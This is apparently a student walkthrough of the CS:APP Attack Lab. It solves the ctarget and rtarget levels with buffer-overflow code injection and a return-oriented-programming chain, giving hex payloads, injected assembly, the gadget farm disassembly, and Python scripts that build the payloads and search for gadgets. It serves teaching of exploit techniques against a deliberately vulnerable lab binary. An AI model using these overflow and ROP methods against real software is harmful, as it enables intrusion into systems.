Note: pass the -q argument when running this lab; otherwise the program checks the hostname and the lab cannot proceed.
In gdb, set the argument with set args -q.
This lab is divided into two major parts, ctarget and rtarget. ctarget has no protections such as stack randomization, whereas rtarget requires using gadgets already in the program, i.e. finding useful code fragments (reading them out of context, so to speak) to carry out the behavior we want.
ctarget
First set a breakpoint at getbuf and enter the program:

The buffer in the red box is the area we attack.
touch1
Disassemble touch1:

From this we learn that the address of touch1 is 0x4017c0. Accounting for little-endian byte order, the data at the return-address slot is c0 17 40 00 00 00 00 00. The region before the return address only needs padding, so the final answer can be:
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00
touch2
The task in touch2 is to make getbuf return to touch2 while passing the cookie as its argument (that is, placing the argument in the rdi register). Because ctarget's stack is executable, the code can be placed directly in the buffer. Here I chose to place the code at the top of the stack in the buffer, i.e. at 0x5561dc78.
Then disassemble touch2 to get its address, 0x4017ec:

Next we can write the code that goes on the stack:
movq $0x59b997fa, %rdi
pushq $0x4017ec
ret
Generate the machine code with gcc -c exploit2.s, then view it with objdump -D exploit2.o, and finally construct the string:
48 c7 c7 fa 97 b9 59
68 ec 17 40 00
c3
00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00
Run ./hex2raw < exploit2.txt | ./ctarget -q and it PASSes:
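As an added example (not code from the original post), the following Python script builds the touch1 and touch2 inputs shown above from the numbers the post gives: the 40-byte buffer implied by the padding, the buffer address 0x5561dc78, the touch1/touch2 addresses and the cookie. The touch2 machine code is assembled by hand from the bytes the post obtained with objdump; the helper names (p64, build_input, to_hex_lines) are this example's own.

```python
# Added example: rebuild the hex2raw-style inputs for ctarget touch1/touch2
# from the layout the post describes (payload, zero padding to the buffer
# size, overwritten return address). Names and helpers are this example's own.
import struct

BUF_SIZE = 40          # size of getbuf's buffer, as the post's padding shows
BUF_ADDR = 0x5561dc78  # start of the buffer (top of the stack frame), from the post
TOUCH1 = 0x4017c0      # address of touch1, from the post's disassembly
TOUCH2 = 0x4017ec      # address of touch2, from the post's disassembly
COOKIE = 0x59b997fa    # the post's cookie value


def p64(value):
    """Little-endian 8-byte encoding, e.g. 0x4017c0 -> c0 17 40 00 00 00 00 00."""
    return struct.pack("<Q", value)


def build_input(payload, return_addr, tail=b""):
    """Lay out getbuf's frame: payload, zero padding up to BUF_SIZE, the
    overwritten return address, then any data placed past it in the caller's frame."""
    if len(payload) > BUF_SIZE:
        raise ValueError("payload does not fit in the buffer")
    padding = b"\x00" * (BUF_SIZE - len(payload))
    return payload + padding + p64(return_addr) + tail


def to_hex_lines(data, width=8):
    """Render bytes as the space-separated hex lines hex2raw accepts."""
    return [" ".join(f"{b:02x}" for b in data[i:i + width])
            for i in range(0, len(data), width)]


# touch1: nothing but padding, then return straight into touch1.
touch1_input = build_input(b"", TOUCH1)

# touch2: the post's three instructions, encoded by hand:
#   48 c7 c7 <imm32>   movq $cookie, %rdi
#   68 <imm32>         pushq $touch2
#   c3                 ret
touch2_code = (b"\x48\xc7\xc7" + struct.pack("<I", COOKIE)
               + b"\x68" + struct.pack("<I", TOUCH2)
               + b"\xc3")
# The return address points back at the buffer start, so getbuf's ret lands on the code.
touch2_input = build_input(touch2_code, BUF_ADDR)

if __name__ == "__main__":
    for name, data in (("touch1", touch1_input), ("touch2", touch2_input)):
        print(name)
        print("\n".join(to_hex_lines(data)))
```

The printed touch1 output is the six lines shown above; the touch2 bytes are the same as the post's string, only grouped eight per line instead of per instruction.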

touch3
The difference from touch2 is that touch3 takes a pointer to the cookie stored as an ASCII string, so the cookie must first be converted to its ASCII byte values, i.e. 35 39 62 39 39 37 66 61 00 (being a string, it needs a trailing \0).
Next disassemble touch3:

Note that touch3 calls other functions, so the string is best placed in a region that will not be handed to the next stack frame (i.e. past the return address, in the previous frame's area). We also learn touch3's address, 0x4018fa, so we can start building the code:
movq $0x5561dca8, %rdi
pushq $0x4018fa
ret
Finally, construct the input string:
48 c7 c7 a8 dc 61 55
68 fa 18 40 00
c3
00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00
35 39 62 39 39 37 66 61 00
rtarget
rtarget introduces stack randomization and a non-executable stack, so we can no longer use pointers to data directly, nor place code in the buffer; instead we must use gadget code already present in the program to perform the operations we need. So the first thing to do is disassemble the farm code region:
0000000000401994 <start_farm>:
401994: b8 01 00 00 00 mov $0x1,%eax
401999: c3 ret
000000000040199a <getval_142>:
40199a: b8 fb 78 90 90 mov $0x909078fb,%eax
40199f: c3 ret
00000000004019a0 <addval_273>:
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 ret
00000000004019a7 <addval_219>:
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3 ret
00000000004019ae <setval_237>:
4019ae: c7 07 48 89 c7 c7 movl $0xc7c78948,(%rdi)
4019b4: c3 ret
00000000004019b5 <setval_424>:
4019b5: c7 07 54 c2 58 92 movl $0x9258c254,(%rdi)
4019bb: c3 ret
00000000004019bc <setval_470>:
4019bc: c7 07 63 48 8d c7 movl $0xc78d4863,(%rdi)
4019c2: c3 ret
00000000004019c3 <setval_426>:
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 ret
00000000004019ca <getval_280>:
4019ca: b8 29 58 90 c3 mov $0xc3905829,%eax
4019cf: c3 ret
00000000004019d0 <mid_farm>:
4019d0: b8 01 00 00 00 mov $0x1,%eax
4019d5: c3 ret
00000000004019d6 <add_xy>:
4019d6: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
4019da: c3 ret
00000000004019db <getval_481>:
4019db: b8 5c 89 c2 90 mov $0x90c2895c,%eax
4019e0: c3 ret
00000000004019e1 <setval_296>:
4019e1: c7 07 99 d1 90 90 movl $0x9090d199,(%rdi)
4019e7: c3 ret
00000000004019e8 <addval_113>:
4019e8: 8d 87 89 ce 78 c9 lea -0x36873177(%rdi),%eax
4019ee: c3 ret
00000000004019ef <addval_490>:
4019ef: 8d 87 8d d1 20 db lea -0x24df2e73(%rdi),%eax
4019f5: c3 ret
00000000004019f6 <getval_226>:
4019f6: b8 89 d1 48 c0 mov $0xc048d189,%eax
4019fb: c3 ret
00000000004019fc <setval_384>:
4019fc: c7 07 81 d1 84 c0 movl $0xc084d181,(%rdi)
401a02: c3 ret
0000000000401a03 <addval_190>:
401a03: 8d 87 41 48 89 e0 lea -0x1f76b7bf(%rdi),%eax
401a09: c3 ret
0000000000401a0a <setval_276>:
401a0a: c7 07 88 c2 08 c9 movl $0xc908c288,(%rdi)
401a10: c3 ret
0000000000401a11 <addval_436>:
401a11: 8d 87 89 ce 90 90 lea -0x6f6f3177(%rdi),%eax
401a17: c3 ret
0000000000401a18 <getval_345>:
401a18: b8 48 89 e0 c1 mov $0xc1e08948,%eax
401a1d: c3 ret
0000000000401a1e <addval_479>:
401a1e: 8d 87 89 c2 00 c9 lea -0x36ff3d77(%rdi),%eax
401a24: c3 ret
0000000000401a25 <addval_187>:
401a25: 8d 87 89 ce 38 c0 lea -0x3fc73177(%rdi),%eax
401a2b: c3 ret
0000000000401a2c <setval_248>:
401a2c: c7 07 81 ce 08 db movl $0xdb08ce81,(%rdi)
401a32: c3 ret
0000000000401a33 <getval_159>:
401a33: b8 89 d1 38 c9 mov $0xc938d189,%eax
401a38: c3 ret
0000000000401a39 <addval_110>:
401a39: 8d 87 c8 89 e0 c3 lea -0x3c1f7638(%rdi),%eax
401a3f: c3 ret
0000000000401a40 <addval_487>:
401a40: 8d 87 89 c2 84 c0 lea -0x3f7b3d77(%rdi),%eax
401a46: c3 ret
0000000000401a47 <addval_201>:
401a47: 8d 87 48 89 e0 c7 lea -0x381f76b8(%rdi),%eax
401a4d: c3 ret
0000000000401a4e <getval_272>:
401a4e: b8 99 d1 08 d2 mov $0xd208d199,%eax
401a53: c3 ret
0000000000401a54 <getval_155>:
401a54: b8 89 c2 c4 c9 mov $0xc9c4c289,%eax
401a59: c3 ret
0000000000401a5a <setval_299>:
401a5a: c7 07 48 89 e0 91 movl $0x91e08948,(%rdi)
401a60: c3 ret
0000000000401a61 <addval_404>:
401a61: 8d 87 89 ce 92 c3 lea -0x3c6d3177(%rdi),%eax
401a67: c3 ret
0000000000401a68 <getval_311>:
401a68: b8 89 d1 08 db mov $0xdb08d189,%eax
401a6d: c3 ret
0000000000401a6e <setval_167>:
401a6e: c7 07 89 d1 91 c3 movl $0xc391d189,(%rdi)
401a74: c3 ret
0000000000401a75 <setval_328>:
401a75: c7 07 81 c2 38 d2 movl $0xd238c281,(%rdi)
401a7b: c3 ret
0000000000401a7c <setval_450>:
401a7c: c7 07 09 ce 08 c9 movl $0xc908ce09,(%rdi)
401a82: c3 ret
0000000000401a83 <addval_358>:
401a83: 8d 87 08 89 e0 90 lea -0x6f1f76f8(%rdi),%eax
401a89: c3 ret
0000000000401a8a <addval_124>:
401a8a: 8d 87 89 c2 c7 3c lea 0x3cc7c289(%rdi),%eax
401a90: c3 ret
0000000000401a91 <getval_169>:
401a91: b8 88 ce 20 c0 mov $0xc020ce88,%eax
401a96: c3 ret
0000000000401a97 <setval_181>:
401a97: c7 07 48 89 e0 c2 movl $0xc2e08948,(%rdi)
401a9d: c3 ret
0000000000401a9e <addval_184>:
401a9e: 8d 87 89 c2 60 d2 lea -0x2d9f3d77(%rdi),%eax
401aa4: c3 ret
0000000000401aa5 <getval_472>:
401aa5: b8 8d ce 20 d2 mov $0xd220ce8d,%eax
401aaa: c3 ret
0000000000401aab <setval_350>:
401aab: c7 07 48 89 e0 90 movl $0x90e08948,(%rdi)
401ab1: c3 ret
0000000000401ab2 <end_farm>:
401ab2: b8 01 00 00 00 mov $0x1,%eax
401ab7: c3 ret
401ab8: 90 nop
401ab9: 90 nop
401aba: 90 nop
401abb: 90 nop
401abc: 90 nop
401abd: 90 nop
401abe: 90 nop
401abf: 90 nop
rtarget is divided into two problems, touch2 and touch3.
touch2
First get the address of touch2, 0x4017ec

So the functionality we need to achieve here is:
48 c7 c7 fa 97 b9 59 mov $0x59b997fa,%rdi
68 ec 17 40 00 push $0x4017ec
c3 ret
or alternatively:
pop %rdi
ret
with the data popped from the stack set to the cookie value.
The first form is far too specialized and almost certainly does not exist in the farm, so we need to find the second form, or a split-up version of it.
The machine code for pop %rdi is 5f, which does not occur in the farm, so we split it into a pop into another register followed by a mov into rdi, i.e. a byte from 58 to 5f (mov %rax,%rdi is generally the most common, since rax holds the return value and rdi the first argument). After the pop we want to return immediately or go on to the next intended operation, so this byte must be followed by 90 (nop, optional) and then c3 (ret).
Following this logic, we can find 0x4019ab and 0x4019cc (pop %rax).
Taking 0x4019cc, we then search for mov %rax,%rdi and find 0x4019a2 and 0x4019c5.
Now the string can be built: pad up to the return address, overwrite it with 0x4019cc, then store the cookie value, then the second gadget address 0x4019c5, and finally the address of touch2 to enter touch2.
So the final answer is:
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
cc 19 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00
c5 19 40 00 00 00 00 00
ec 17 40 00 00 00 00 00
The answer is not unique.
touch3
Unfinished; not sure whether it will be continued...
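As an added example (not code from the original post), the following Python script performs the byte search described above mechanically: it parses the start_farm to mid_farm part of the objdump listing reproduced in the post, looks for the two gadget shapes the post is after (a 58..5f pop byte, or 48 89 c7 for movq %rax,%rdi, followed by an optional 90 and then c3), and lays the found addresses out in the same order as the final answer. The listing text is copied from the post; the buffer size of 40 is inferred from the post's padding; the function names (load_image, find_gadgets, build_chain) are this example's own.

```python
# Added example: scan the post's farm listing for the gadget shapes the post
# describes and rebuild its rtarget touch2 chain. Helper names are this example's own.
import re
import struct

# The start_farm..mid_farm part of the objdump listing, copied from the post.
FARM_DUMP = """
0000000000401994 <start_farm>:
401994: b8 01 00 00 00 mov $0x1,%eax
401999: c3 ret
000000000040199a <getval_142>:
40199a: b8 fb 78 90 90 mov $0x909078fb,%eax
40199f: c3 ret
00000000004019a0 <addval_273>:
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 ret
00000000004019a7 <addval_219>:
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3 ret
00000000004019ae <setval_237>:
4019ae: c7 07 48 89 c7 c7 movl $0xc7c78948,(%rdi)
4019b4: c3 ret
00000000004019b5 <setval_424>:
4019b5: c7 07 54 c2 58 92 movl $0x9258c254,(%rdi)
4019bb: c3 ret
00000000004019bc <setval_470>:
4019bc: c7 07 63 48 8d c7 movl $0xc78d4863,(%rdi)
4019c2: c3 ret
00000000004019c3 <setval_426>:
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 ret
00000000004019ca <getval_280>:
4019ca: b8 29 58 90 c3 mov $0xc3905829,%eax
4019cf: c3 ret
00000000004019d0 <mid_farm>:
4019d0: b8 01 00 00 00 mov $0x1,%eax
4019d5: c3 ret
"""

BUF_SIZE = 40          # getbuf's buffer, inferred from the post's padding
TOUCH2 = 0x4017ec
COOKIE = 0x59b997fa
POP_REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]  # opcodes 58..5f

# "<addr>: <hex bytes> ..." lines; section headers ("... <name>:") do not match.
LINE_RE = re.compile(r"^\s*([0-9a-f]+):\s+((?:[0-9a-f]{2}\s)+)")


def load_image(dump):
    """Place each listing line's bytes at its address; return (base, contiguous bytes)."""
    chunks = []
    for line in dump.splitlines():
        m = LINE_RE.match(line)
        if m:
            chunks.append((int(m.group(1), 16), bytes.fromhex(m.group(2))))
    base = min(addr for addr, _ in chunks)
    image = bytearray(max(addr + len(data) for addr, data in chunks) - base)
    for addr, data in chunks:
        image[addr - base:addr - base + len(data)] = data
    return base, bytes(image)


def ends_in_ret(image, i):
    """True if image[i:] starts with c3, or with 90 c3 (optional nop before ret)."""
    if image[i:i + 1] == b"\x90":
        i += 1
    return image[i:i + 1] == b"\xc3"


def find_gadgets(base, image):
    """Map each gadget description to the addresses where that byte sequence starts.
    Scans every byte offset, not just instruction boundaries, like the post's search."""
    found = {}
    for i in range(len(image)):
        if 0x58 <= image[i] <= 0x5f and ends_in_ret(image, i + 1):
            found.setdefault(f"pop %{POP_REGS[image[i] - 0x58]}", []).append(base + i)
        if image[i:i + 3] == b"\x48\x89\xc7" and ends_in_ret(image, i + 3):
            found.setdefault("movq %rax,%rdi", []).append(base + i)
    return found


def build_chain(pop_rax, mov_rax_rdi):
    """Padding, then: pop %rax gadget, cookie (popped into rax), movq %rax,%rdi gadget, touch2."""
    words = (pop_rax, COOKIE, mov_rax_rdi, TOUCH2)
    return b"\x00" * BUF_SIZE + b"".join(struct.pack("<Q", w) for w in words)


if __name__ == "__main__":
    base, image = load_image(FARM_DUMP)
    gadgets = find_gadgets(base, image)
    for desc, addrs in gadgets.items():
        print(desc, [hex(a) for a in addrs])
    chain = build_chain(gadgets["pop %rax"][1], gadgets["movq %rax,%rdi"][1])
    print(chain.hex())
```

Running it reports pop %rax at 0x4019ab and 0x4019cc and movq %rax,%rdi at 0x4019a2 and 0x4019c5, and no pop %rdi at all, which is exactly the hand search above; picking the second address of each reproduces the post's final string.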